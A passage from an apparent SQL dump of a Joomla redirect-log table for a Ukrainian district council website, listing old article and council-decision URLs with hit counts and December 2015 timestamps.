00:00:00',301),(21911,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1188:2014-01-28-09-45-21&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:25:13','0000-00-00 00:00:00',301),(21912,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=330:2011-05-20-16-28-08&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:25:25','0000-00-00 00:00:00',301),(21913,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=581:2012-02-27-13-13-19&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:25:42','0000-00-00 00:00:00',301),(21914,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=997:-27-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:25:43','0000-00-00 00:00:00',301),(21915,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=699:--------------2011-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:25:47','0000-00-00 00:00:00',301),(21916,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:29:21','0000-00-00 00:00:00',301),(21917,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1183:2014-01-28-09-18-31&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:29:29','0000-00-00 00:00:00',301),(21918,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1310:2014-05-06-14-07-43&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-15 07:29:37','0000-00-00 00:00:00',301),(21919,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1096:2013-09-24-13-34-16&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 07:29:43','0000-00-00 00:00:00',301),(21920,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 07:32:23','0000-00-00 00:00:00',301),(21921,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=209:2010-12-15-14-27-50&Itemid=60&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 07:32:31','0000-00-00 00:00:00',301),(21922,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:32:35','0000-00-00 00:00:00',301),(21923,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=867:2012-12-14-10-13-30&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:32:37','0000-00-00 00:00:00',301),(21924,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:32:43','0000-00-00 00:00:00',301),(21925,'http://www.malyn-rayrada.org.ua/index.php?id=37&Itemid=72&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-15 07:32:50','0000-00-00 00:00:00',301),(21926,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 07:32:52','0000-00-00 00:00:00',301),(21927,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=343:-2011-&Itemid=68&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:32:55','0000-00-00 00:00:00',301),(21928,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=832:-9-2012-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:36:01','0000-00-00 00:00:00',301),(21929,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=982:2013-04-03-11-58-18&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:43:43','0000-00-00 00:00:00',301),(21930,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=503:-2017-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:43:51','0000-00-00 00:00:00',301),(21931,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=885:-2013-2015-&Itemid=85&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:47:34','0000-00-00 00:00:00',301),(21932,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=599:-l-r-2011-2016-&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:47:40','0000-00-00 00:00:00',301),(21933,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&lang=en&option=com_content&view=article','','','',4,0,'2015-12-15 07:47:48','0000-00-00 00:00:00',301),(21934,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=279:2011-03-31-08-20-23&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:47:54','0000-00-00 00:00:00',301),(21935,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1110:-9-2013-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:48:00','0000-00-00 00:00:00',301),(21936,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1329:2014-06-02-11-51-47&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-15 07:51:12','0000-00-00 00:00:00',301),(21937,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1339:2014-06-12-09-22-34&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:51:18','0000-00-00 00:00:00',301),(21938,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=872:2012-12-17-18-45-20&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 07:51:24','0000-00-00 00:00:00',301),(21939,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=702:-2011-2013-&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 07:51:38','0000-00-00 00:00:00',301),(21940,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=771:------------2012-2015--&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:51:44','0000-00-00 00:00:00',301),(21941,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1311:-69-1941-1945-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-15 07:52:00','0000-00-00 00:00:00',301),(21942,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:52:07','0000-00-00 00:00:00',301),(21943,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1315:-31-6-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-15 07:52:12','0000-00-00 00:00:00',301),(21944,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 07:52:17','0000-00-00 00:00:00',301),(21945,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1142:-l-r-&Itemid=95&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 07:52:22','0000-00-00 00:00:00',301),(21946,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 07:56:58','0000-00-00 00:00:00',301),(21947,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=505:2011-12-16-13-24-32&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:04:19','0000-00-00 00:00:00',301),(21948,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=746:-2012-&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:05:55','0000-00-00 00:00:00',301),(21949,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:06:05','0000-00-00 00:00:00',301),(21950,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=452:-20-2011-100-l-r-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:06:12','0000-00-00 00:00:00',301),(21951,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=983:2013-04-04-11-23-57&Itemid=88&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:06:19','0000-00-00 00:00:00',301),(21952,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=944:-l-r-&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:06:25','0000-00-00 00:00:00',301),(21953,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1200:2014-01-31-07-40-52&Itemid=97&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 08:06:35','0000-00-00 00:00:00',301),(21954,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1301:-28-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-15 08:06:39','0000-00-00 00:00:00',301),(21955,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:06:48','0000-00-00 00:00:00',301),(21956,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1089:-l-r-&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:06:52','0000-00-00 00:00:00',301),(21957,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=789:-2012-2014-&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:07:04','0000-00-00 00:00:00',301),(21958,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1152:2013-11-28-14-58-05&Itemid=95&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:07:08','0000-00-00 00:00:00',301),(21959,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1166:2014-01-06-08-21-04&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 08:07:09','0000-00-00 00:00:00',301),(21960,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1141:2013-11-26-13-18-12&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:07:12','0000-00-00 00:00:00',301),(21961,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1100:2013-10-02-18-03-10&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:07:39','0000-00-00 00:00:00',301),(21962,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=192:2010-12-15-13-29-12&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:07:46','0000-00-00 00:00:00',301),(21963,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=195:------------2010-&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:07:54','0000-00-00 00:00:00',301),(21964,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=764:2012-09-26-12-58-07&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:07:58','0000-00-00 00:00:00',301),(21965,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=449:2011-10-28-08-04-47&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:08:05','0000-00-00 00:00:00',301),(21966,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=682:-2012-&Itemid=80&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:14:23','0000-00-00 00:00:00',301),(21967,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=854:2012-12-11-13-40-55&Itemid=64&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:14:27','0000-00-00 00:00:00',301),(21968,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:14:40','0000-00-00 00:00:00',301),(21969,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=926:2013-02-21-09-02-30&Itemid=86&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:15:42','0000-00-00 00:00:00',301),(21970,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=542:-2011-&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:15:54','0000-00-00 00:00:00',301),(21971,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=634:-2016-&Itemid=80&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 08:15:55','0000-00-00 00:00:00',301),(21972,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1078:-2007-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:16:01','0000-00-00 00:00:00',301),(21973,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=313:-2011-2015-&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:16:02','0000-00-00 00:00:00',301),(21974,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1187:2014-01-28-09-43-51&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 08:16:06','0000-00-00 00:00:00',301),(21975,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 08:16:07','0000-00-00 00:00:00',301),(21976,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1193:-2014-2015-&Itemid=97&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-15 08:18:28','0000-00-00 00:00:00',301),(21977,'http://www.malyn-rayrada.org.ua/index.php?id=30:--30122010-&Itemid=61&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-15 08:23:18','0000-00-00 00:00:00',301),(21978,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1062:2013-07-29-13-33-29&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:23:21','0000-00-00 00:00:00',301),(21979,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=870:2012-12-17-07-02-51&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 08:23:25','0000-00-00 00:00:00',301),(21980,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=984:-20-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:23:39','0000-00-00 00:00:00',301),(21981,'http://www.malyn-rayrada.org.ua/index.php?catid=27&id=142:2010-10-15-06-19-49&Itemid=58&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:23:44','0000-00-00 00:00:00',301),(21982,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:23:50','0000-00-00 00:00:00',301),(21983,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=515:2011-12-22-10-09-17&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:23:52','0000-00-00 00:00:00',301),(21984,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=704:--------20--2011--108-l---r----&Itemid=70&lang=en&option=com_content&view=article','','','',3,0,'2015-12-15 08:23:55','0000-00-00 00:00:00',301),(21985,'http://www.malyn-rayrada.org.ua/index.php?id=31&Itemid=62&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-15 08:24:02','0000-00-00 00:00:00',301),(21986,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-15 08:24:08','0000-00-00 00:00:00',301),(21987,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=984:-20-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:24:11','0000-00-00 00:00:00',301),(21988,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1064:2013-08-09-07-52-21&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 08:26:50','0000-00-00 00:00:00',301),(21989,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1142:-------l-r---&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:27:18','0000-00-00 00:00:00',301),(21990,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=879:2012-12-21-17-02-01&Itemid=85&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 08:36:19','0000-00-00 00:00:00',301),(21991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=649:-2011-2015-&catid=42:--16052012-&Itemid=80&lang=en','','','',2,0,'2015-12-15 08:39:38','0000-00-00 00:00:00',301),(21992,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=669:-2011-56-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 09:02:30','0000-00-00 00:00:00',301),(21993,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=345:2011-06-15-12-28-17&Itemid=68&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 09:22:16','0000-00-00 00:00:00',301),(21994,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=480:2011-11-28-10-11-58&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 09:27:29','0000-00-00 00:00:00',301),(21995,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1330:2014-06-03-06-17-00&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-15 09:29:10','0000-00-00 00:00:00',301),(21996,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&Itemid=94&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 09:29:19','0000-00-00 00:00:00',301),(21997,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=861:-qq&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 09:29:28','0000-00-00 00:00:00',301),(21998,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=613:2012-03-26-14-13-34&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 09:29:49','0000-00-00 00:00:00',301),(21999,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=744:2012-07-28-09-50-03&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 09:29:53','0000-00-00 00:00:00',301),(22000,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1162:2013-12-19-06-13-29&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-15 09:29:58','0000-00-00 00:00:00',301),(22001,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1179:2014-01-21-12-44-04&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 09:30:02','0000-00-00 00:00:00',301),(22002,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=441:-l-2011-2014-r-&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 09:30:06','0000-00-00 00:00:00',301),(22003,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1012:l-r&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-15 09:30:11','0000-00-00 00:00:00',301),(22004,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1062:2013-07-29-13-33-29&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 09:30:15','0000-00-00 00:00:00',301),(22005,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=408:------------------2011-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 09:30:20','0000-00-00 00:00:00',301),(22006,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=836:-6732012&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-15 09:30:41','0000-00-00 00:00:00',301),(22007,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1312:2014-05-08-08-59-19&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-15 09:30:54','0000-00-00 00:00:00',301),(22008,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=319:-2009-2011-&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 09:31:22','0000-00-00 00:00:00',301),(22009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=229:-2011-&catid=30:--30122010-&Itemid=61&lang=ru','','','',44,0,'2015-12-15 09:31:38','0000-00-00 00:00:00',301),(22010,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=853:2012-12-11-13-39-46&Itemid=64&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-15 09:31:42','0000-00-00 00:00:00',301),(22011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=683:------------------------2012-&catid=42:--16052012-&Itemid=80&lang=en','','','',2,0,'2015-12-15 11:57:15','0000-00-00 00:00:00',301),(22012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=uk','','','',3,0,'2015-12-15 14:54:12','0000-00-00 00:00:00',301),(22013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-15 15:38:58','0000-00-00 00:00:00',301),(22014,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=719:-lr&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 20:18:47','0000-00-00 00:00:00',301),(22015,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=982:2013-04-03-11-58-18&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-15 21:35:21','0000-00-00 00:00:00',301),(22016,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=48&Itemid=87&lang=ru','','','',5,0,'2015-12-16 00:38:40','0000-00-00 00:00:00',301),(22017,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=ru','','','',6,0,'2015-12-16 04:25:25','0000-00-00 00:00:00',301),(22018,'http://malyn-rayrada.org.ua/contact','','http://malyn-rayrada.org.ua/contact','',2,0,'2015-12-16 04:39:03','0000-00-00 00:00:00',301),(22019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&Itemid=14&lang=uk','','','',1,0,'2015-12-16 06:16:18','0000-00-00 00:00:00',301),(22020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en','','','',3,0,'2015-12-16 06:18:30','0000-00-00 00:00:00',301),(22021,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/983-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',4,0,'2015-12-16 10:50:33','0000-00-00 00:00:00',301),(22022,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1063-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-josipivskoji-silskoji-radi','','','',4,0,'2015-12-16 10:51:16','0000-00-00 00:00:00',301),(22023,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/634-pro-pogodzhennja-peredachi-v-orendu-primishhen-pid?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-16 12:15:03','0000-00-00 00:00:00',301),(22024,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=7','','','',5,0,'2015-12-16 12:16:20','0000-00-00 00:00:00',301),(22025,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1109-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-yaki-nadayutsya-v-orendu-gr-yakimenko-n-m','','','',5,0,'2015-12-16 12:16:36','0000-00-00 00:00:00',301),(22026,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',5,0,'2015-12-16 12:16:37','0000-00-00 00:00:00',301),(22027,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-16 12:16:41','0000-00-00 00:00:00',301),(22028,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1125-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',3,0,'2015-12-16 12:16:43','0000-00-00 00:00:00',301),(22029,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1095-pro-zatverdzhennya-rezultativ-auktsionnikh-torgiv-z-prodazhu-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',5,0,'2015-12-16 12:16:49','0000-00-00 00:00:00',301),(22030,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1096-pro-peredachu-primishchennya-gorinskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-gorinskoji-silskoji-radi','','','',12,0,'2015-12-16 12:16:58','0000-00-00 00:00:00',301),(22031,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1097-pro-khid-vikonannya-rajonnoji-programi-rozvitku-agropromislovogo-kompleksu-malinskogo-rajonu-na-2011-2015-roki-ta-pidsumki-vesnyano-polovikh-robit','','','',6,0,'2015-12-16 12:17:03','0000-00-00 00:00:00',301),(22032,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1098-pro-zvernennya-do-derzhavnoji-finansovoji-inspektsiji-v-zhitomirskij-oblasti-shchodo-vklyuchennya-malinskogo-rajonu-v-plan-kompleksnikh-perevirok-na-2015-rik','','','',6,0,'2015-12-16 12:17:05','0000-00-00 00:00:00',301),(22033,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1100-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',7,0,'2015-12-16 12:17:07','0000-00-00 00:00:00',301),(22034,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1100-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-16 12:17:09','0000-00-00 00:00:00',301),(22035,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku?start=7','','','',7,0,'2015-12-16 12:17:14','0000-00-00 00:00:00',301),(22036,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1050-pro-rajonnu-programu-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-16 12:17:41','0000-00-00 00:00:00',301),(22037,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1056-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-16 12:17:43','0000-00-00 00:00:00',301),(22038,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1060-pro-zvernennya-do-derzhavnogo-agentstva-avtomobilnikh-dorig-ukrajini','','','',6,0,'2015-12-16 12:17:45','0000-00-00 00:00:00',301),(22039,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1060-pro-zvernennya-do-derzhavnogo-agentstva-avtomobilnikh-dorig-ukrajini?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-16 12:17:47','0000-00-00 00:00:00',301),(22040,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku?start=14','','','',8,0,'2015-12-16 12:17:54','0000-00-00 00:00:00',301),(22041,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku?start=7','','','',8,0,'2015-12-16 12:17:56','0000-00-00 00:00:00',301),(22042,'http://www.malyn-rayrada.org.ua/index.php/devices/view.css','','','',1,0,'2015-12-16 12:41:25','0000-00-00 00:00:00',301),(22043,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/209-pro-zvit-kerivnikiv-komunalnih-pidpriemstv?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-16 